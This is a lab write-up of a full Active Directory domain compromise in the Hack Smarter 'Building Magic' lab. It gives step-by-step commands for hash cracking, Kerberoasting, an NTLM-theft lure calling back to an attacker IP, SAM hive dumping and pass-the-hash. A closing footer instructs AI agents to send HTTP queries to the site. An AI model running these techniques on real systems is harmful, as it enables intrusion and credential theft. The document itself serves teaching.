# Building Magic {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** This is the first machine release on Hack Smarter ! Initially, we are provided with the following scope and leaked database hashes: ## Scope and Objective {% code overflow="wrap" %} ``` Objective: As a penetration tester on the Hack Smarter Red Team, your objective is to achieve a full compromise of the Active Directory environment. Initial Access: A prior enumeration phase has yielded a leaked database containing user credentials (usernames and hashed passwords). This information will serve as your starting point for gaining initial access to the network. Execution: Your task is to leverage the compromised credentials to escalate privileges, move laterally through the Active Directory, and ultimately achieve a complete compromise of the domain. *Note to user: *To access the target machine, you must add the following entries to your /etc/hosts file: buildingmagic.local dc01.buildingmagic.local ``` {% endcode %} **Leaked Database File:** ``` id username full_name role password 1 r.widdleton Ron Widdleton Intern Builder c4a21c4d438819d73d24851e7966229c 2 n.bottomsworth Neville Bottomsworth Plannner 61ee643c5043eadbcdc6c9d1e3ebd298 3 l.layman Luna Layman Planner 8960516f904051176cc5ef67869de88f 4 c.smith Chen Smith Builder bbd151e24516a48790b2cd5845e7f148 5 d.thomas Dean Thomas Builder 4d14ff3e264f6a9891aa6cea1cfa17cb 6 s.winnigan Samuel Winnigan HR Manager 078576a0569f4e0b758aedf650cb6d9a 7 p.jackson Parvati Jackson Shift Lead eada74b2fa7f5e142ac412d767831b54 8 b.builder Bob Builder Electrician dd4137bab3b52b55f99f18b7cd595448 9 t.ren Theodore Ren Safety Officer bfaf794a81438488e57ee3954c27cd75 10 e.macmillan Ernest Macmillan Surveyor 47d23284395f618bea1959e710bc68ef ``` ## Recon The Nmap scan of `10.1.168.5` revealed numerous Windows/Active Directory-related services, including DNS `53`, Kerberos `88/464`, LDAP `389/636/3268/3269`, SMB `139/445`, RPC `135/593`, and RDP `3389`, alongside web services on ports `80` and `8080`. This indicates the host is likely a domain controller with both directory services and a web application attack surface. ``` nmap -Pn 10.1.168.5 ```

The default script and service scan does not provide any further information, but only confirms the domains that are already known from the scope. ``` nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,8080 -Pn 10.1.168.5 ``` ``` BUILDINGMAGIC.LOCAL DC01.BUILDINGMAGIC.LOCAL ``` ## Access as r.widdleton We continue cracking the existing hashes using hashcat and are able to crack only one password. ``` hashcat -a0 -m0 hashes.txt /usr/share/wordlists/rockyou.txt --username --show ```

Further hashes could be cracked using the site `https://crackstation.net/`.

From the Nmap scan, we know that `SMB` is available. We use `NetExec` and test the cracked passwords. We are successful with the user `r.widdelton`. ``` nxc smb 10.1.168.5 -u 't.ren' -p 'REDACTED' --shares ``` ``` nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --shares ```

We see that there is a share called `File-Share`, but we have neither `read` nor `write` access to it. But we have `read` access to the `IPC$` share, which allows us to perform a `rid` brute force. ## Username Enumeration We will see if we can find other users besides those with leaked credentials. To do this, we use the aforementioned `rid` bruteforce. ``` nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --rid ```

And we are able to get the following users, which might come in handy later. ``` h.potch r.widdleton r.haggard h.grangon a.flatch ``` ## Access as r.haggard With the credentials from `r.widdleton`, we continue with the enumeration and use Bloodhound for this purpose. Since I had problems with DNS timeouts, I used DNSChef for this case. ``` dnschef.py --fakeip 10.1.168.5 -q ```

We run the collectors script `bloodhound-ce.py` with the credentials of `r.widdleton`. {% code overflow="wrap" %} ``` bloodhound-ce.py --zip -c All -d BUILDINGMAGIC.LOCAL -u r.widdleton -p REDACTED -dc DC01.BUILDINGMAGIC.LOCAL -ns 127.0.0.1 ``` {% endcode %}

We feed the data into Bloodhound and analyse it using the available cypher queries and the `OutBound Object Control` relationships. We see that `r.widdleton` does not have any special permissions. But we find a Kerberosatbale user: `r.haggard`.

We use `GetUserSPNs.py` to Kerberoast the user using the credentials of `r.widdleton`. And we receive the `Kerberos 5, etype 23, TGS-REP` blob from `r.haggard`. {% code overflow="wrap" %} ``` GetUserSPNs.py -dc-host DC01.BUILDINGMAGIC.LOCAL BUILDINGMAGIC.LOCAL/'r.widdleton':'REDACTED' -request ``` {% endcode %}

Fortunately, this could be cracked using hashcat. And we have now access as `r.haggard`. ``` hashcat -m13100 -a0 '' /usr/share/wordlists/rockyou.txt ```

## Access as h.potch We take another look at the data we collected with Bloodhound. Let's take a closer look at `r.haggard`'s `Outbound Object Control`. The user is able to change `h.potch`'s password. The user `h.potch` does not appear to have any further permissions or usable relationships in Bloodhound, but we will see what else he can do in a moment.

Next, we change the password of `h.potch` with the credentials of `r.haggerd` using `net rpc`. {% code overflow="wrap" %} ``` net rpc password 'h.potch' 'newP@ssword2022' -U 'BUILDINGMAGIC.LOCAL/r.haggard%REDACTED' -S DC01.BUILDINGMAGIC.LOCAL ``` {% endcode %}

We enumerate the shares using NetExec and see that we are now able to `read` and `write` to the share `File-Share` that we have already discovered. ``` nxc smb BUILDINGMAGIC.LOCAL -u 'h.potch' -p 'newP@ssword2022' --shares ```

## Shell as h.grangon However, the share appears to be empty. ``` smbclient //10.1.168.5/File-Share -U 'BUILDINGMAGIC.LOCAL\h.potch%newP@ssword2022' ```

But since we can `write`, we can try to place a file in the share that connects to us when opened or viewed in browser and reveals the hash of the calling user. This is called `NTLM theft`. There is already a handy tool for creating such files: {% embed url="" %} We prepare the files, ``` ntlm_thef.py --verbose --generate modern --server 10.200.0.156 --filename "meetingXYZ" ```

and set up resonder (with `root` privileges) to catch the request. ``` responder -I tun0 ``` Next, we place the `.lnk` file in that share.

We get a connection with the `NTLMv2-SSP` of `h.grangon`.

Once again, we are able to crack the hash. ``` hashcat -m5600 -a0 '' /usr/share/wordlist/rockyou.txt ```

In Bloodhound, we see that this user is in the `Remote Management Users` group. This allows us to connect to the machine using evil-winrm. Remember, port `5985` is open.

We connect to the machine using evil-winrm and find the first flag at `C:\Users\h.grangon\Desktop\user.txt`. ``` evil-winrm -i DC01.BUILDMAGIC.LOCAL -u 'h.grangon' -p 'REDACTED' ```

## Shell as a.flatch The user has a fatal permission: `SeBackupPrivilege`. This allows us to copy the `SAM` and `SYSTEM` hive. From this, we can then extract hashes using Impackets secretsdump. ``` whoami /priv ```

We save hives and download those using evil-winrm. The download of the `SYSTEM` hive via `evil-winrm` might take some time. ``` reg save HKLM\SAM "C:\Users\h.grangon\Documents\SAM" ``` ``` reg save HKLM\SYSTEM "C:\Users\h.grangon\Documents\SYSTEM" ```

Next we dump the hashes using Impackets `secretsdump`. We are now in the possesion of the local Administrator hash. But it seems like it cannot be used using either of the Impacket exec tools like `wmiexec.py` or `psexec.py` nor evil-winrm. ``` secretsdump.py -sam './SAM' -system './SYSTEM' LOCAL ```

Recalling the users list gathered from the `rid` brute force we try the hash on all the users we know of and are successful with `a.fletch`. ``` nxc smb BUILDINGMAGIC.LOCAL -u users.txt -H REDACTED --continue-on-success ```

We see that this user is also an Administrator.

We connect to the machine as `a.fletch` using the hash.

And we find the final flag at `C:\Users\Administrator\Desktop\root.txt`.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/hack-smarter-labs/2025/building-magic.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.